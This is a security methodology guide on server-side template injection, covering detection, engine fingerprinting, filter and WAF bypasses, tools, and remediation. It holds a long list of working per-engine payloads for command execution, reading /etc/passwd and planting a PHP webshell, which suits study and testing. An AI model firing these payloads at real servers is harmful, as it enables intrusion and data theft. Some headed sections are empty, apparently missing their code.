Server-Side Template Injection (SSTI)

Server-Side Template Injection

Template engines are software used to generate dynamic web pages. When user input is unsafely embedded into templates, server-side template injection (SSTI) can occur, potentially leading to Remote Code Execution (RCE).

Shortcut

• Look for all locations where user input is reflected or used in the response (URL parameters, POST data, HTTP headers, JSON data, etc.).

• Inject template syntax characters/polyglots like ${{<%[%'"}}%\, {{7*'7'}}, {{7*7}} into inputs. Check for errors, mathematical evaluation (e.g., 49 instead of 7*7), or missing/changed reflections.

• Verify server-side evaluation (e.g., math works) vs. client-side XSS.

• Use engine-specific syntax (e.g., ${7/0}, {{7/0}}, <%= 7/0 %>), known variable names ({{config}}, {$smarty}), or error messages to identify the template engine (use a decision tree like PortSwigger's or HackTricks').

• Look up payloads specific to the identified engine and backend language.

• Use engine-specific payloads (see Methodologies) to read files, execute commands, access internal data, or escape sandboxes.

• Create a non-destructive proof of concept (e.g., touch ssti_poc_by_YOUR_NAME.txt via RCE).

Mechanisms

Server-Side Template Injection (SSTI) occurs when attacker-controlled input is embedded unsafely into a server-side template. Instead of treating the input as data, the template engine executes it as part of the template's code. This allows injecting template directives to execute arbitrary code, access server data, or perform actions as the application.

Root Cause: Concatenating or directly rendering user input within a template string without proper sanitization or using insecure template functions.

• Misusing “helper” APIs that compile raw strings at runtime, such as render_template_string, Template::render_inline, or Template.compile, which appear safe but execute attacker‑supplied data.

Vulnerable Example 1 (Simple Jinja2)

The following program takes user input and concatenates it directly into a template string:

If user_input is {{1+1}}, the engine executes the expression:

Vulnerable Example 2 (Flask/Jinja2)

Secure Example (Flask/Jinja2)

Hunt

Preparation

• Identify all user-controlled input points: URL parameters, POST data, HTTP headers (Referer, User-Agent, custom headers), JSON keys/values, etc.

• Use tools like waybackurls and qsreplace to generate fuzzing lists for parameters:

Detection

• Initial Fuzzing: Inject basic polyglots: ${{<%[%'"}}%\, {{7*'7'}}, {{7*7}}, ${7*7}, quote‑less payloads such as {{[].__class__.__mro__[1]}}.

• Observe Behavior:

  • Errors: Stack traces or specific error messages can reveal the template engine (e.g., Jinja2, Smarty, FreeMarker).

  • Evaluation: Input like {{7*7}} becomes 49.

  • Blank Output: The payload might be processed and removed if invalid or if it performs an action without output.

  • No Change: Input reflected exactly as provided; likely not vulnerable (or requires different syntax).

• Differentiate from XSS: Ensure the evaluation happens server-side, not client-side. ${7*7} evaluating to 49 strongly suggests SSTI.

Identification

Engine-Specific Payloads

Use a systematic approach based on the initial observations or a decision tree (PortSwigger, updated July 2024, Medium).

Additional Common Engines (2024‑2025)

Variable Probing

Try injecting known variables for common frameworks: {{config}}, {{settings}}, {{app.request.server.all|join(',')}}, {$smarty.version}.

Bypass Techniques

Character Blacklist Bypass

• Use alternative syntax: getattr(object, 'attribute') instead of object.attribute. Use {{request|attr('application')}} instead of {{request.application}}.

• Use array/dictionary access: request['application'] instead of request.application.

• Hex/Octal Encoding (if interpreted server-side): request['\x5f\x5fglobals\x5f\x5f'] instead of request['__globals__'].

• URL Parameter manipulation (Source: HackTricks):

  • Pass attribute name: ?c=__class__ -> {{ request|attr(request.args.c) }}

  • Construct attribute name: ?f=%s%sclass%s%s&a=_ -> {{ request|attr(request.args.f|format(request.args.a,request.args.a,request.args.a,request.args.a)) }}

  • List join: ?l=a&a=_&a=_&a=class&a=_&a=_ -> {{ request|attr(request.args.getlist(request.args.l)|join) }}

Note: The index for subprocess.Popen differs between CPython 3.11 and 3.12; enumerate __subclasses__() at runtime instead of hard‑coding.

Keyword Filtering Bypass

• Concatenation: 'os'.__class__ -> 'o'+'s'

• Using request object attributes or environment variables if keywords like import or os are blocked.

• Jinja2 Context Variables: Access os via {{ self._TemplateReference__context.cycler.__init__.__globals__.os }} or similar paths (Source: Podalirius).

NET Reflection

Use reflection to load assemblies or invoke methods indirectly. On modern ASP.NET Core, Razor limits direct process start; look for misused Html.Raw, custom tag helpers, or debug compilation flags.

String-less Exploitation

Modern WAFs often filter quotes and common keyword tokens. 2025 research showed how to build strings from arithmetic or list indices.

For Node templating (EJS/Pug/Handlebars server-side), prefer prototype traversal to reach Function or require when helpers expose evaluation sinks:

Recent CVEs (2024‑2025)

Automated Scanning & CI Integration

• nuclei and semgrep include up‑to‑date SSTI rules; integrate them into pull‑request checks.

• GitHub code‑scanning query pack “SSTI” (released 2024‑10) covers Python, PHP, Go.

• Add a CI gate blocking merges on raw render_template_string or .format() inside templates.

Vulnerabilities

Common vulnerable patterns include:

• Direct Rendering: render_template_string("Hello " + user_input)

• Unsafe Variable Usage: {{ unsafe_variable }} where unsafe_variable contains template code.

• Framework-Specific Functions: Using functions known to be dangerous if processing user input (consult framework documentation).

Methodologies

Tools

Active Exploitation:

• tplmap: python tplmap.py -u 'http://www.target.com/page?name=John*' (https://github.com/epinna/tplmap)

• SSTImap: python3 sstimap.py -u "https://example.com/page?name=John" -s

• TInjA: tinja url -u "http://example.com/?name=Kirlia"

• crithit – SSTI‑centric fuzzer supporting Go/Tera, Blade, and Mako (2024)

Burp Suite Extensions:

• Template Injector – maintained fork replacing TemplateTester

• Server Side Template Injection - Active scanner checks

• Param Miner - Discover hidden parameters that might accept template input

Scanning & Detection:

• nuclei (templates/ssti-*) – fast HTTP scanner with updated SSTI signatures (2024-2025)

• semgrep with SSTI rulesets – Static analysis for template injection vulnerabilities

• GitHub CodeQL "SSTI" query pack (2024-10) – Covers Python, PHP, Go

Framework-Specific:

• Jinja2 Sandbox Escape Tools - Testing Jinja2 sandboxed environments

• Node Template Tester - EJS/Pug/Handlebars/Nunjucks testing suite

Manual Testing & Exploitation Payloads

• Generic/Polyglot:

  • ${{<%[%'"}}%\.

  • {{7*7}} -> 49

  • {{7*'7'}} -> 7777777

  • {{ '7'*7 }} (Jinja2) -> 7777777

  • @(1+2) (.NET Razor) -> 3

• Jinja2 (Python / Flask):

  • Debug/Info: {{config}}, {{self}}, {{settings.SECRET_KEY}}, {% debug %} (Requires debug extension)

  • List Subclasses: {{ [].__class__.__base__.__subclasses__() }} , {{ ''.__class__.__mro__[1].__subclasses__() }} (Index 1 or 2 depending on Python version)

  • Recover object Class: {{ ''.__class__.__mro__[1] }} (or [2]), {{ ''.__class__.__base__ }}

  • Find File Class: Iterate through subclasses list or guess index, e.g., [40] on some systems.

  • Read File (via __subclasses__): {{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }} (Index varies)

  • RCE (via __subclasses__): {{ ''.__class__.__mro__[1].__subclasses__()[XXX]('cat /etc/passwd',shell=True,stdout=-1).communicate()[0].strip() }} (Find subprocess.Popen index, e.g., 396)

  • RCE (Common - via __globals__): {{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

  • RCE (via request object - __globals__): {{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }}

  • RCE (via config object - __globals__): {{ config.__class__.from_envvar.__globals__.__builtins__.__import__("os").popen("ls").read() }}

  • RCE (Alternative via __globals__ search): {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("ls").read()}}{%endif%}{% endfor %} (Search for a class with _module attribute)

  • RCE (via config and import_string): {{ config.__class__.from_envvar.__globals__.import_string("os").popen("ls").read() }}

  • RCE (via request and hex/brackets bypass): {{ request['application']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('id')['read']() }}

  • Write File (via __subclasses__): {{ ''.__class__.__mro__[1].__subclasses__()[40]('/tmp/evil', 'w').write('hello') }} (Index varies)

  • Write Evil Config & RCE:

  • Avoid HTML Encoding: {{'<script>alert(1)</script>'|safe}}

  • Loop: {%raw %}{% for c in [1,2,3] %}{{ c,c,c }}{% endfor %}{% endraw %}

• FreeMarker (Java):

  • RCE: <#assign command="freemarker.template.utility.Execute"?new()> ${ command("cat /etc/passwd") }

  • RCE: ${"freemarker.template.utility.Execute"?new()("id")}

  • File Read: ${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")} (May require adjustments)

  • Info: ${class.getResource("").getPath()}, ${T(java.lang.System).getenv()}

• Smarty (PHP):

  • {$smarty.version}

  • {php}echo id;{/php} (If PHP tag enabled)

  • {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())} (Write webshell)

  • {{7*7}}, {{7*'7'}}

  • {{dump(app)}} (Symfony)

  • "{{'/etc/passwd'|file_excerpt(1,30)}}"@ (Twig)

• Velocity (Java):

  • #set($str=$class.inspect("java.lang.String").type)

  • #set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))

  • $ex.waitFor()

  • #set($out=$ex.getInputStream()) ... #foreach ... $str.valueOf($chr.toChars($out.read())) ... #end (Read command output)

• Ruby (ERB, Slim):

  • <%= system("whoami") %>

  • <%= Dir.entries('/') %>

  • <%= File.open('/etc/passwd').read %>

• Node.js (Various engines):

  • {{this.constructor.constructor('return process.mainModule.require("child_process").execSync("id")')()}}

  • Payloads often involve traversing prototypes (this.__proto__) to reach constructor and eventually Function or require. See PayloadAllTheThings / Hacker Recipes for detailed Node examples.

• ASP/.NET (Razor, etc.):

  • @(1+2) -> 3

  • @System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");

  • <%= CreateObject("Wscript.Shell").exec("cmd /c whoami").StdOut.ReadAll() %> (Classic ASP)

• Perl (Template Toolkit):

  • [% PERL %] ... perl code ... [% END %]

  • <%= perl code %> or <% perl code %> (Depending on config)

• Go (text/template):

  • Potentially dangerous if methods allowing command execution are exposed to the template: {{ .System "ls" }}

  • html/template is generally safer against XSS but might still leak info if not used carefully.

Comprehensive Payloads

• PayloadsAllTheThings - SSTI

• PayloadBox - SSTI

Chaining and Escalation

SSTI often leads directly to RCE, but can also be used for:

• RCE: Primary goal, gain shell access.

• File Exfiltration: Read sensitive files (/etc/passwd, web.config, source code, credentials).

• Information Disclosure: Dump environment variables, application configuration ({{config}}, {{settings}}), object properties, internal network paths.

• Internal Network Access: Use RCE to pivot, scan internal networks, or access internal services.

• Privilege Escalation: Combine RCE with local exploits if the web server runs with elevated privileges.

• Data Exfiltration: Send internal data to an attacker-controlled server (e.g., via HTTP requests or DNS exfiltration from within the template code).

• SSRF pivot: Some engines permit URL‑fetch filters ({{''|fetch('http://...')}}); leverage SSTI to query cloud‑metadata endpoints.

Remediation Recommendations

• Never Render User Input Directly: The most critical step. Treat user input as data, not code.

• Use Safe Templating Practices:

  • Pass user data into templates using dedicated template variables (e.g., render_template('page.html', user_data=user_input)).

  • Use logic-less templates if possible.

• Sanitize and Validate: If rendering user input is unavoidable (e.g., CMS), rigorously sanitize it. Remove or escape all template syntax characters ({, }, $, %, <, >, etc.). Use allow-lists for safe HTML if needed.

• Use Sandboxed Environments: Configure the template engine's sandbox if available and effective for the specific engine. Be aware that sandboxes can often be bypassed.

• Choose Safer Engines: Prefer engines designed for security, like Go's html/template over text/template for HTML output, as it provides context-aware auto-escaping.

• Principle of Least Privilege: Run the web application process with minimal privileges.

• Input Validation: Validate input against expected formats (e.g., email, number) before it reaches the template layer.

• Patch management: track and apply security updates for template engines (see Recent CVEs).

• Harden runtime: enable seccomp/AppArmor or gVisor so that even a successful RCE has minimal kernel attack surface.

• CI guardrails: block usage of dangerous APIs (e.g., render_template_string, Template.compile, eval filters) via linters/semgrep; add approve‑list of safe helpers

• For Node: disable with in EJS, avoid compileDebug, and run with vm sandbox only when fully locked down (no require or Function reachable)